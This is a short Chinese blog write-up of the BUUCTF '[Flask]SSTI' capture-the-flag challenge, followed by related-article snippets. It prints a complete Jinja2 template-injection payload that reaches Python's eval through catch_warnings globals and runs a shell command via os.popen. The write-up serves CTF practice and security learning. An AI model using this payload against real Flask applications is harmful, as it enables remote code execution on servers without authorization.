buuctf-[Flask]SSTI

最新推荐文章于 2024-04-14 22:20:04 发布
最新推荐文章于 2024-04-14 22:20:04 发布
阅读量1k 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/124298520
版权

页面上只有Hello guest,源代码上也是什么都没有,抓包添加XFF也没有改变。

是要GET一个参数name,这个不好想到

 顺便确定有SSTI漏洞

<加字母就会被过滤

Smarty中的方法也不能用了

获取eval函数并执行任意python代码的POC

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

 

m0_62094846
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dash-flask-login:在Dash之上实现Flask-login
02-05
破折号登录 这是在Dash应用程序顶部进行Flask登录的示例,用于用户身份验证。 该示例通过sqlite3数据库进行用户身份验证,但是您可以通过在config.txt文件中使用数据库URI更改con参数来使用自己的数据库。 这个例子...
portrait-matting-unet-flask:使用PyTorch在UNet中实现人像匹配
02-05
细分演示结果: 哑光演示结果: 为了方便演示,我通过Flask构建了API服务,最后将其部署在微信小程序中。 微信小程序的代码部分在此处。 依存关系 Python 3.6 PyTorch> = 1.1.0 火炬视觉> = 0.3.0 烧瓶1.1.1 ...
[Flask]SSTI
1ance's blog
11-18 1441
文章目录环境解题思路参考 环境 BUUCTF上的在线环境,启动靶机,获取链接: http://node4.buuoj.cn:27904 解题思路 访问后显示页面。 根据题目提示是考SSTI,所以我们传个name参数看看。 http://node4.buuoj.cn:27904/?name=12,将我们的12显示在页面。 我们在构造{{2*3}}看看,是否存在SSTI。 成功执行了乘法,说明是存在SSTI的,接下来我们要做的是寻找可以执行命令的函数所在的类。 这里我在网上找的: {% for c in
BUUCTF-Real-[Flask]SSTI
分享
02-02 1165
服务端模板注入SSTI,可进行代码执行操作!
CTF-web-ssti模板注入漏洞
最新发布
Ye的博客
04-14 785
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。SSTI 漏洞是一种常见的 Web 安全漏洞,它允许攻击者在服务器端模板引擎中注入恶意代码,导致服务器执行攻击者控制的代码,可能导致信息泄露、服务器被接管等安全问题。,那么页面上就会显示。
Buuctf[Flask]SSTI 1
F1or_的博客
09-28 2634
最近CTF比赛里出了一道SSTI的题目,当时没有做出来,现在来学习下 SST是由于开发者的不恰当言语所造成 <html> <head> <title>SSTI_TEST</title> </head> <body> <h1>Hello, %s !</h1> </body> </html> 正确代码应是 <html> <head&g
Bugku CTF——WEB之SSTI学习笔记
qq_51096893的博客
12-19 4204
目录 知识前提 一.题目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些题目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF题目类型(我们今天讲解的是WEB类型中注入问题): 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
BUUCTF SSTI模板注入小结(持续更新)
CN天狼
05-02 1257
BUUCTF部分SSTI模板注入小结 [护网杯 2018]easy_tornado [BJDCTF2020]The mystery of ip [BJDCTF2020]Cookie is so stable [CISCN2019 华东南赛区]Web11 [WesternCTF2018]shrine [GYCTF2020]FlaskApp [CSCCTF 2019 Qual]FlaskLight
SSTI例题buu[Flask]SSTI
cuddlylm的博客
04-08 3238
方法一:手注 打开只有这个 访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。 这里的54289是233233的运算结果 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
qq_39947980的博客
03-13 1506
CTF题型 SSTI(1)基础必过 学会自己手动构造payload
dash-flask-login:一个集成Dash和Flask-Login的插件
02-05
Dash与Flask-Login的集成 介绍 Dash-Flask-Login是一种 ,可与流行的集成以进行用户会话管理。 Dash-Admin旨在即插即用! 提供用户身份验证应该很简单: 身份验证= FlaskLoginAuth(dash_app) 文献资料 目前,请...
python-flask-0.10.1-5.el7.noarch.rpm
01-02
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
awesome-flask:精选的Flask资源和插件的精选列表
01-31
awesome-flask:精选的Flask资源和插件的精选列表
buuctf13(perl脚本GET open命令漏洞&redis主从复制&xss&ssti关键字过滤绕过&csrf)
weixin_63231007的博客
02-27 1088
[HITCON 2017]SSRFme & [网鼎杯 2020 玄武组]SSRFMe & [GWCTF 2019]mypassword & [GWCTF 2019]你的名字& [GKCTF 2021]CheckBot
[pasecactf_2019]flask_ssti proc ssti config
m0_64180167的博客
12-13 714
其实这个很简单首先ssti 直接fenjing一把锁了这里被加密后 存储在 config中了 然后我们去config中查看即可{{config}}可以获取到flag的值然后就可以写代码解密因为都是异或 异或的异或就是 原本 所以不需要修改就可以输出flag。
buuctf刷题8 (ssti注入&nmap- oG指令&别样的sql注入)
weixin_63231007的博客
10-15 879
get_flashed_message()是通过flash()传入闪现信息列表的,能够把字符串对象表示的信息加入到一个消息列表,然后通过调用get_flashed_message()来取出。5.__get()中的p赋值为Modifier类,那么相当于Modifier类被当作函数处理,所以会触发Modifier类中的__invoke()魔术方法。继续看一下getSign函数。这样的语法构造还包括:echo,print,unset(),isset(),empty(),include,require,...
[CTFHub]Cookie:hello guest. only(web>web前置技能>HTTP协议)
ZXW_NUDT的博客
04-29 637
这道题我解题的时间还是特别长的。 首先按F12调出 然后点击network 如下图 然后可以看到有一个“admin=0” 然后我们找到Application,将admin的值改为1 然后刷新一下就得到了flag
buuctf--easyflask
qq_46263951的博客
01-04 864
根据提示访问/file?file=index.js,可以看到提示源码在/app/source #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type
BUUCTF web admin (flask_session问题)
H4ppyD0g的博客
02-23 1368
检查源码,发现有注释<!-- you are not admin -->,应该是提示用admin账号登录。 两个功能,注册和登录,想到之前做过一个注册admin加空格的题,试了一下不成功。 然后老老实实注册一个普通用户 显示了自己的用户名,我们的目的因该是让自己的用户名变成admin才行。 change password只能修改自己账号的密码,没有漏洞。 post可能有xss漏洞,交...
flask ssti
09-26
Flask SSTI(Server-Side Template Injection)是指在Flask应用中,由于未正确处理用户输入,导致用户输入的模板言被当作代码执行的漏洞。攻击者可以通过向模板注入恶意代码来执行任意命令或获取敏感信息。要防止SSTI漏洞,开发者需要注意对用户输入进行适当的过滤和转义。 在上面提供的代码中,虽然简单,但存在SSTI漏洞的潜在风险。因为在模板中,我们可以看到没有对用户输入进行任何处理,直接将其作为字符串插入到返回的HTML中。这就为攻击者注入恶意代码提供了机会。 为了防止SSTI漏洞,我们应该使用Flask提供的安全特性,如使用Jinja2模板引擎的自动转义功能。通过将用户输入标记为安全,Jinja2会自动过滤掉其中的危险代码,从而防止SSTI攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值